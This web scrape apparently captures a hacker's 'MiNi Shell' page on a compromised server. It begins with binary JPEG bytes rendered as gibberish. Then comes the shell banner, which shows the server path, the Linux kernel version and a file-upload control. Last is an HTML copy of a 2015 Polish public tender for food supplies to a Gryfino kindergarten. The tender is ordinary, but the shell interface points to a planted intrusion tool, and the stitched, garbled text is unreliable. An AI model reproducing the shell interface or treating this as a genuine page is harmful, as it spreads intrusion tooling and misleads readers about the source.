JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150616/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150616/88099-N-2015.html

<p class="kh_header"><b>Gryfino: Zakup i dostawa produktów spożywczych dla Przedszkola Nr 2 im. Misia Uszatka w Gryfinie</b><br>
<b>Numer ogłoszenia: 88099 - 2015; data zamieszczenia: 16.06.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Gryfino - Przedszkole Nr 2 im. Misia Uszatka , ul. Krzywoustego 5, 74-100 Gryfino, woj. zachodniopomorskie, tel. 91 4162925, faks 91 4152182.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://uszatkaprzedszkole.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa produktów spożywczych dla Przedszkola Nr 2 im. Misia Uszatka w Gryfinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest zakup i dostawa pieczywa/produktów zbożowych, nabiału, mleka i wyrobów mleczarskich, owoców i warzyw, produktów suchych, mięsa i wędlin, ryb, napojów, tłuszczy, mrożonek, jaj dla potrzeb Przedszkola Nr 2 im. Misia Uszatka w Gryfinie.
Zakres zamówienia: 
GRUPA I: pieczywo / produkty zbożowe

1.Bułka maślana 0,10 kg	-1900 szt, 2.Bułka razowa z ziarnami 0,08 kg-5200 szt, 3. Bułka tarta 0,5 kg	-360 szt, 4.	Bułki świeże pszenne 0,09 kg	- 2600 szt, 5.Chałka maślana 0,3 kg-160 szt, 6.Chleb 7 ziaren 0,4 kg	- 1800 szt, 7.Chleb graham 0,5 kg-400 szt, 8.Chleb krojony na naturalnym zakwasie chlebowym 0,5 kg-2200 szt, 9.Chleb słonecznikowy 0,4 kg-1080 szt, 10.Chleb staropolski 0,7 kg-480 szt, 11.	Chleb żytni 0,7 kg-500 szt, 12.Drożdżówki 0,10 kg-1000 szt, 13.Kawiorka 0,3 kg-500 szt, 14.Paluch drożdżowy 0,10 kg-600 szt, 15.Pączek 0,10 kg-325 szt, 16.Rogal maślany 0,10 kg-2500 szt.

GRUPA II: nabiał, mleko i wyroby mleczarskie

		
1.Deser sojowy waniliowy 0,125kg-240 szt, 2.Jogurt naturalny: gęsty, zawierający mleko, białko mleka, żywe kultury bakterii jogurtowych oraz L. acidophilus i Bifidobacterium lactis. 0,37l - 0,39l typu Bakoma, Zott lub równoważny-3050 szt, 3.	Kefir o zawartości tłuszczu 1,8 % zawierający: mleko, mleko w proszku, białka mleka, aktywne kultury bakterii mlekowych oraz Lactobacillus acidophilus i Bifidobacterium 0,4l typu Augustowski lub równoważny-500 szt, 4.Mleko świeże o zawartości 2% tłuszczu 1l-12000 l, 5.Mozzarella kulka 0,125kg-200 szt, 6.Ser śmietankowy naturalny, gęsty, kremowy. Skład: śmietanka pasteryzowana, kultury bakterii typu Delfiko lub równoważny 1kg-250 szt, 7.Ser żółty twardy Gouda lub Morski skład: mleko, sól, podpuszczka, bakterie kwasu mlekowego-100 kg, 8.Ser żółty twardy w plastrach Gouda 1kg skład: mleko, sól, podpuszczka, bakterie kwasu mlekowego-150 szt, 10.Serek 0,12kg wyprodukowany z twarogu z mleka pasteryzowanego typu Bakuś lub równoważny-300 szt, 11.	Serek kieszonka o smaku waniliowym, truskawkowym, wyprodukowany z twarogu z mleka pasteryzowanego typu Bakuś lub równoważny-200 szt, 12.Serek naturalny, 0,15kg skład: mleko pełne pasteryzowane, czyste kultury mleczarskie typu Bieluch lub równoważny-200 szt, 13.Serek homogenizowany waniliowy, 0,14kg, wyprodukowany z twarogu odtłuszczonego z mleka, śmietanki, z naturalnym aromatem waniliowym typu Danio lub równoważny-6600 szt, 14.Śmietana słodka do zup i sosów, zawartość tłuszczu  12%. 0,5l typu Łaciata lub równoważna-250 szt, 15.Śmietanka słodka do zup i sosów, zawartość tłuszczu 18%, 0,5l typu Łaciata lub równoważna-1100 szt, 16.Śmietana wiejska, gęsta, kremowa, lekko kwaskowa o zawartości tłuszczu 12% - 0,4l-350 szt, 17.Twaróg półtłusty krajanka-130 kg, 18.Twaróg śmietankowy pakowany po 0,25kg-330 kg.

Grupa III: owoce i warzywa
		
1.Ananas świeży-30 szt, 2.Arbuz-400 kg, 3.Awokado-5 kg, 4.Banan-1700 kg, 5.Bazylia świeża doniczka-20 szt, 6.Borówka amerykańska 0,25kg-150 szt, 7.Botwina-40 pęczków, 8.Brokuł świeży 0,5kg-80 szt, 9.Brukselka-5 kg, 10.Brzoskwinia-100 kg, 11.Burak czerwony-1500 kg, 12.Cebula-400 kg, 13.Cukinia-30 kg, 14.Cytryna-125 kg, 15.Czosnek-75 szt, 16.Fasolka szparagowa-20 kg, 17.Grejpfrut czerwony-50 kg, 18.Gruszka Konferencja	1250 kg, 19.Imbir świeży-10 kg, 20.Jabłka o średnicy  8cm, obwód 25cm-2800 kg, 21.Jagody-30 kg, 22.Kalafior świeży-250 szt, 23.Kalarepa-50 szt, 24.Kapusta biała-80 kg, 25.Kapusta czerwona-180 kg, 26.Kapusta kiszona-440 kg, 27.Kapusta młoda-40 kg, 28.Kapusta pekińska-400 kg, 29.Kapusta włoska-30 szt, 30.	Kiełki brokuł 0,25kg-25 szt, 31.Kiełki rzodkiewki 0,25kg-25 szt, 32.Kiwi-1500 szt, 33.	Koper zielony-620 pęczków,34.Maliny 0,25kg-180 szt, 35.Mandarynka-550 kg, 36.Marchew I gatunek, bez przebarwień-2400 kg, 37.Marchew młoda pęczek-100 szt, 38.Morela-40 kg, 39.Natka pietruszki pęczek-1300 pęczków, 40.Nektaryna-400 kg, 41.Ogórek kiszony-370 kg, 42.Ogórek małosolny-40 kg, 43.Ogórek świeży-450 kg, 44.Papryka świeża czerwona-80 kg, 45.Papryka świeża żółta-80 kg, 46.Pietruszka-400 kg, 47.Pomarańcza-2000 kg, 48.Pomidor koktajlowy świeży-50 kg, 49.	Pomidor malinowy świeży-150 kg, 50.Pomidor świeży-400 kg, 51.Por-180 kg, 52.Rzodkiew biała-80 kg, 53.Rzodkiewka-650 pęczków, 54.Sałata masłowa-80 szt, 55.Sałata zielona lodowa-280 szt, 56.Seler-600 kg, 57.Szarlotka jabłka 0,9kg-70 szt, 58.Szczaw-30 pęczków, 59.Szczypior-650 pęczków, 60.Śliwka sezonowa-80 kg, 61.Truskawki świeże-120 kg, 62.Winogrono różowe-100 kg, 63.Winogrono zielone-100 kg, 64.Ziemniaki-9000 kg, 65.Ziemniaki czerwone-5500 kg, 66.Ziemniaki młode-1400 kg.

Grupa IV - produkty suche
		
1.Ananas w puszce krążki 0,32kg-50 szt, 2.Ananas w puszce kostka 2,6kg-20 szt,
3.Barszcz biały skład: skrobia, sól, laktoza, maltodekstryna, mąka pszenna, tłuszcz roślinny, białka mleka, ekstrakt drożdżowy, cukier, tłuszcz z wędzonego boczku wieprzowego (3%), kwas: kwas cytrynowy, cebula, czosnek, zioła: majeranek, liść laurowy, aromaty, pieprz biały, wędzone drożdże, ziele angielskie, pietruszka korzeń, aromat dymu wędzarniczego, przeciwutleniacz: wyciągi z rozmarynu, glukoza typu Winiary 0,066kg lub równoważny-650 szt, 4.Bazylia o korzenno - balsamicznym zapachu i lekko kwaskowym, chłodząco - orzeźwiającym smaku typu Kamis, Prymat 0,010kg lub równoważna-30 szt, 5.Biszkopty okrągłe, miękkie, lekko słodkie, bez konserwantów typu Biszkopty Wrocławskie Mamut 0,12kg lub równoważne-280 szt, 6.Brzoskwinia puszka 0,560kg-140 szt, 7.Brzoskwinia puszka 2,6kg-12 szt, 8.Chrupki kukurydziane 0,07kg-1300 szt, 9.Chrzan w słoiczku o zwartości min 60 % chrzanu, 270g typu  Fructus lub równoważny-12 szt, 10.	Ciecierzyca-40 kg, 11.Cukier 1kg-1600 kg, 12.Cukier puder 0,5kg-6 szt, 13.Cukier waniliowy 0,016kg-550 szt, 14.Cynamon 0,02kg-10 szt, 15.Cukierki karmelki o smaku ananasa i marakui z nadzieniem musującym typu Zozole lub równoważne-4 kg, 16.Deser dla niemowląt mus owocowy o zawartości min 90% owoców, bez konserwantów, 0,190kg typu Bobovita, Gerber lub równoważny-1000 szt, 17.Deser dla niemowląt mus owocowy o zawartości min 90% owoców, bez konserwantów, 0,125kg typu Bobovita, Gerber lub równoważny-150 szt, 18.Dynia łuskana 100g-100 szt, 19.Dżem extra gładki wyprodukowany z min 65g owoców na 100 g, bez cukru, 0,28kg typu Łowicz lub równoważny-260 szt, 20.Fasola czerwona 400g-25 szt, 21.Fasola sucha łuskana-30 kg, 22.Galaretka owocowa bez konserwantów, z naturalnymi barwnikami, torebka 75g-120 szt, 23.Groch suchy łuskany połówki-80 kg, 24.Guma rozpuszczalna o smaku owocowym, opakowanie po 5 szt. typu Mamba lub równoważna-100 szt, 25.Herbata miętowa T20 wyraźny smak mięty bez obcych zapachów typu Herbapol lub równoważna-30 szt, 26.Herbata owocowa torebki, 20T,  żurawina, malina o wyraźnym smaku typu Herbapol lub równoważna-400 szt, 27.Herbata  Rooibos ekspresowa z czerwonokrzewu, bez kofeiny,   25 torebek, 0,037kg typu Astra lub równoważna-30 szt, 28.Herbata lipowa skład: 100% kwiatostanu lipy, 20T, opakowanie 30g typu Herbapol lub równoważna-15 szt, 29.Herbata czarna w torebkach, naturalny smak, bez goryczy, bursztynowy kolor, 90T, 0,126kg typu Saga lub równoważna-100 szt, 30.Herbata z dzikiej róży, zawartość owocu dzikiej róży 66%, o wyraźnym smaku, 20T typu Herbapol lub równoważna-40 szt, 31.Herbata z melisy, o składzie 100% liści melisy, 20T, typu Herbapol lub równoważna-20 szt, 32.Herbatka granulowana, owocowa dla niemowląt powyżej 9 miesiąca życia 200g typu Bobovita lub równoważna-5 szt, 33.Herbatniki kruche 0,016kg typu be be lub równoważne-2600 szt, 34.Kakao o obniżonej zawartości tłuszczu (zawartość tłuszczu kakaowego 10-12%), 150g typu Decamoreno  lub równoważne-120 szt, 35.Kasza gryczana saszetki 0,4kg	-400 szt, 36.Kasza jaglana 0,4kg-150 szt, 37.Kasza jęczmienna wiejska średnia 1kg-50 kg, 38.Kasza jęczmienna saszetki 0,4kg-230 szt, 39.Kasza kukurydziana 0,4kg-80 szt, 40.Kasza kus-kus-24 kg, 41.	Kasza manna 1kg-100 kg, 42.Kasza pęczak 1kg-210 kg, 43.Kaszka mleczno-ryżowa o smaku waniliowym, wyprodukowana z mleka modyfikowanego, 230g typu Bobovita lub równoważna-25 szt, 44.Kawa zbożowa skład: jęczmień, żyto, cykoria, burak cukrowy, prażone zboża 72 %, 150g typu Inka lub równoważna-200 szt, 45.Ketchup z przetartych pomidorów, bez konserwantów, sporządzony z 230g pomidorów na 100g produktu, 200 ml typu KROKUS lub równoważny-500 szt, 46.Kisiel cytrynowy z cukrem i witaminą C, 0,077kg typu Winiary lub równoważny-2300 szt, 47.Kleik ryżowy 0,170kg-3 szt, 48.Koncentrat buraczany, skład: zagęszczony sok z buraków ćwikłowych (min 59%), 0,3l typu Krakus  lub równoważny-10 szt, 49.Koncentrat pomidorowy 30% 1kg, kolor żywo czerwony, wyprodukowany ze świeżych pomidorów, bez żadnych dodatków typu Pudliszki lub równoważny-220 szt, 50.Koncentrat pomidorowy 30%, 200g, kolor żywo czerwony, wyprodukowany ze świeżych pomidorów, bez żadnych dodatków typu Pudliszki lub równoważny-30 szt, 51.Krem czekoladowo - orzechowy 350g typu Nutella lub równoważny-15 szt, 52.Kukurydza puszka, słodka,  złocista,  400g-200 szt, 53.Kwasek cytrynowy 0,020kg-160 szt, 54.Liść laurowy, bez obcych zapachów 0,06kg typu Appetita  lub równoważny-25 szt, 55.Lizaki owocowe wzbogacone witaminami typu Nimm2 lub równoważne-100 szt, 56.Ciastko biszkoptowe z nadzieniem owocowym min. 75% przecieru owocowego, 0,03kg typu Lubisie lub równoważne-1500 szt, 57.Majeranek otarty, aromatyczny, 0,08kg typu Appetita lub równoważny-50 szt, 58.Majonez stołowy o zawartości tłuszczu 71,2 %, bez zawartości  substancji konserwujących, wzmacniaczy smaku, barwników, zagęstników ani aromatów, 700-900ml typu Społem Majonez Kielecki lub równoważny-60 szt, 59.Makaron w kształcie literek, Skład: kasza pszenna makaronowa, semolina, masa jajowa pasteryzowana chłodzona 21,3%, woda  0,4kg-40 szt, 60.Makaron muszelka drobna, bezjajeczny, 100 % semoliny, pochodzącej z przemiału pszenicy durum, bez dodatków i ulepszaczy, 0,4kg typu Lubella, Malma  lub równoważny-520 szt, 61.Makaron nitka krótka, cięta, bezjajeczna, 100 % semoliny pochodzącej z przemiału pszenicy durum, bez dodatków i ulepszaczy, 0,5kg typu Lubella lub równoważny-820 szt, 62.Makaron nitka rosołowa składniki: semolina, mąka makaronowa z pszenicy durum, jaja 13%, woda, 0,25kg typu Goliard lub równoważny-300 szt, 63.	Makaron świderki bezjajeczny, skład: mąka makaronowa pszenna 0,5 kg typu Lubella lub równoważny-340 szt, 64.	Makaron z pełnego ziarna skład:  mąka makaronowa pszenna pełnoziarnista, 0,4kg typu Lubella  lub równoważny-80 szt, 65.Mąka orkiszowa 1kg-15 kg, 66.Mąka pszenna typ 500, konsystencja sypka, bez grudek, barwa biała z odcieniem żółtym, wilgotność nie większa niż 15%, 1kg, typu Basia lub równoważna-600 kg, 67.Mąka ziemniaczana 1kg-14 kg, 68.Miód prawdziwy wielokwiatowy 400g-220 szt, 69.Morela suszona bezsiarkowa, 1kg typu BIOEDEN lub równoważna-10 szt, 70.Mleko kokosowe 0,4l-25 szt, 71.Musztarda delikatesowa 400ml-10 szt, 72.Ogórek konserwowy 0,9l-20 szt, 73.Oregano, wysuszone liście i kwiatostany rośliny, zapach przyjemny, aromatyczny, delikatny i korzenny, 0,010kg typu  Kamis  lub równoważny-28 szt, 74.Orzechy nerkowca niesolone-6 kg, 75.Paluszki orkiszowe 120g-80 szt, 76.Papryka słodka mielona, kolor żywo czerwony, 0,010kg typu Appetita  lub równoważna-400 szt, 77.Pasztet drobiowy 130g typu Profi firmowy lub równoważny-1000 szt, 78.Pieprz cytrynowy o wyraźnym cytrynowym smaku, 0,020kg typu Kamis lub równoważny-55 szt, 79.Pieprz mielony, wyrazisty, ostry aromat i piekący smak, 0,010kg typu Kamis  lub równoważny-280 szt, 80.Płatki jęczmienne 0,4kg-60 szt, 81.Płatki jaglane 0,4kg-60 szt, 82.Płatki orkiszowe 0,3kg-60 szt, 83.Płatki kukurydziane, otrzymane z ziaren kukurydzy, struktura i konsystencja sypka, płatki nie pokruszone, bez grudek, barwa złotożółta z różnymi odcieniami, smak i zapach charakterystyczny dla płatków kukurydzianych lekko słodki 0,5kg typu Nestle  lub równoważne-80 szt, 84.Płatki owsiane 0,4kg-30 szt, 85.Płatki ryżowe 0,4kg-70 szt, 86.Pomidory całe bez skóry w puszce 400g-50 szt, 87.Amarantus ekspandowany - preparowane ziarno amarantusa  90g-70 szt, 88.Powidła śliwkowe bez konserwantów  0,29 ml-60 szt, 89.Lubczyk suszony, aromatyczny, wyrazisty 0,03g-25 szt, 90.Rodzynki bezsiarkowe sułtańskie bio  0,4kg-100 szt, 91.Ryż brązowy saszetki, 0,4kg typu Sonko lub równoważny-140 szt, 92.Ryż biały saszetki, 0,4kg typu Sonko lub równoważny-380 szt, 93.Ryż biały długoziarnisty 1kg-120 kg, 94.Sezam 1kg-10 kg, 95.Sezamki 0,03kg-100 szt, 96.Słonecznik łuskany 100g-250 szt, 97.Snacki popcornowe niesolone 0,06kg typu Popcool Delicate lub równoważne-200 szt, 98.Soczewica czerwona 0,35kg-32 szt, 99.Sól 1kg-280 kg, 100.	Śliwka bezsiarkowa bio  0,4kg-30 szt, 101.	Tymianek 0,010kg  typu Appetita lub równoważny-20 szt, 102.Wafle śmietankowo - kakaowe bez polewy czekoladowej, 28g typu Goplana Grześki lub równoważne-200 szt, 103.Wafle ryżowe, okrągłe, o grubości 1cm, bez cukru i bez soli 120g typu Sonko lub równoważne-720 szt, 104.Wafle zbożowo - ryżowe bez konserwantów, naturalne, okrągłe o średnicy ok. 13,5cm, opakowanie 12 szt. typu Sunny Corn lub równoważne-520 szt, 105.Zacierka  skład: semolina - mąka makaronowa z PSZENICY durum, pasteryzowana masa JAJOWA 10%, woda, drobna, gładka, nie krusząca się 0,25kg typu Goliard lub równoważna	-220 szt, 106.Ziele angielskie 0,015kg typu Appetita lub równoważne-25 szt, 107.Zioła prowansalskie skład: oregano, cząber, rozmaryn, bazylia, majeranek, tymianek, 0,010kg typu Kamis lub równoważne-20 szt, 108.Żurawina suszona-60 kg, 109.Żurek butelka 0,5l-20 szt, 110.Wafle ryżowe wieloziarniste 0,1kg-350 szt, 111.Żurek bez konserwantów 0,066kg typu Winiary lub równoważny-150 szt.

Grupa V - mięso i wędliny
		
1.Łopatka b/k-275 kg, 2.Szynka b/k	1340 kg, 3.Schab b/k-680 kg, 4.Kurczak-1680 kg, 5.Filet z kurczaka bez skóry-680 kg, 6.Korpus-1000 kg, 7.Filet z indyka-370 kg, 8.Pałki drobiowe-400 kg, 9.Szynka wieprzowa - 100g wytworzono z min 131g mięsa typu szynka Rocha lub równoważna-110 kg, 10.Kurczak gotowany/wędlina 85% fileta z kurczaka-50 kg, 11.Kiełbasa podwawelska średnio rozdrobniona-20 kg, 12.Kiełbasa krucha drobiowa 100g wytworzono z min 113g mięsa-40 kg, 13.Parówki cielęce-330 kg, 14.Kiełbaska biała parzona drobiowa cienka-135 kg, 15.Szynka delikatesowa z kurcząt o zawartości 89% mięsa z piersi kurcząt	-80 kg, 16.Schab kniazia 100g wytworzono z min. 122g mięsa-80 kg, 17.Szynka z kotła 100 % mięsa wieprzowego-80 kg, 18.Kiełbasa śląska ekstra, średnio rozdrobniona, parzona-80 kg 19.Kaszanka z wątróbką-20 kg.
 
Grupa VI - ryby
		
1.Dorsz atlantycki bez skóry, bez glazury, mrożony-680 kg, 2.Łosoś wędzony brzuszki-50 kg, 3.	Makrela wędzona	200 kg, 5.Miruna ze skórą, filet, bez glazury-550 kg.

Grupa VII - napoje
		
1.Woda mineralna niegazowana  1,5l-1400 szt, 2.Woda mineralna niegazowana dziubek 0,33l-1400 szt, 3.Sok multiwitamina, sok wieloowocowy - marchwiowy 100% soki z zagęszczonych soków z: jabłek (60%) i pomarańczy (22%), sok z marchwi z zagęszczonego soku (12%), przeciery z: bananów (3%), brzoskwiń, gujawy i papai, soki z zagęszczonych soków z: ananasów (2%), mango (0,5%), marakui (0,1%), liczi (0,05%), figi kaktusowej, kiwi i limonek, witaminy: A, C, E, B6, B12, tiamina, ryboflawina, niacyna, biotyna, kwas foliowy i kwas pantotenowy, 1l typu Tymbark lub równoważny-400 szt, 4.Sok owocowo - warzywny dla niemowląt i małych dzieci, 100 % owoców i warzyw 300ml, typu Bobofrut lub równoważny-680 szt, 5.Sok wieloowocowy z zagęszczonych soków 100%, 200ml typu Tymbark lub równoważny-2000 szt, 6.Jednodniowy sok marchwiowy 0,5 l-1200 szt.

Grupa VIII - tłuszcze
		
1.Olej rzepakowy rafinowany z pierwszego tłoczenia, 1l typu Kujawski lub równoważny-600 szt, 2.Oliwa z oliwek extra vergine  0,5l-55 szt, 3.Masło zawartość tłuszczu min. 82% 200g	-3800 szt.

Grupa IX - mrożonki
		
1.Brokuł  2,5kg-240 kg, 2.Brukselka 2,5kg-14 kg, 3.Bukiet warzyw (brokuł, marchew, kalafior) 2,5kg-120 kg, 4.Dynia kostka 2,5kg-100 kg, 5.Fasolka szparagowa cięta żółta 2,5kg-80 kg, 6.Fasolka szparagowa cięta zielona 2,5kg	-260 kg, 7.Groszek zielony 2,5kg-100 kg, 8.Kalafior 2,5kg-180 kg, 9.Malina 2,5kg-240 kg, 10.Truskawka 2,5kg-680 kg, 11.Marchew z groszkiem 2,5kg-30 kg, 12.Marchew kostka 2,5kg-100 kg, 13.Mieszanka kompotowa z czarną porzeczką  2,5kg-600 kg, 14.Borówka amerykańska-25 kg, 15.	Mieszanka kompotowa bez śliwki 2,5kg-270 kg, 16.Czarna porzeczka 2,5kg-440 kg, 17.Wiśnia bez pestki 2,5kg-80 kg, 18.Włoszczyzna paski 2,5kg-20 kg, 19.Lody śmietankowe z odtłuszczonego mleka i śmietanki, na patyku 100g typu Big Milk lub równoważne-325 szt, 20.	Lody wodne owocowe bez zawartości mleka, 73 ml, typu Pirulo arbuzowe lub równoważne-20 szt.

Grupa X - jaja
		
1.Jaja kurze rozmiar L-13600 szt..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 PZP stanowiących nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6, 15.81.10.00-9, 15.33.11.70-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełnienia tego warunku</p>
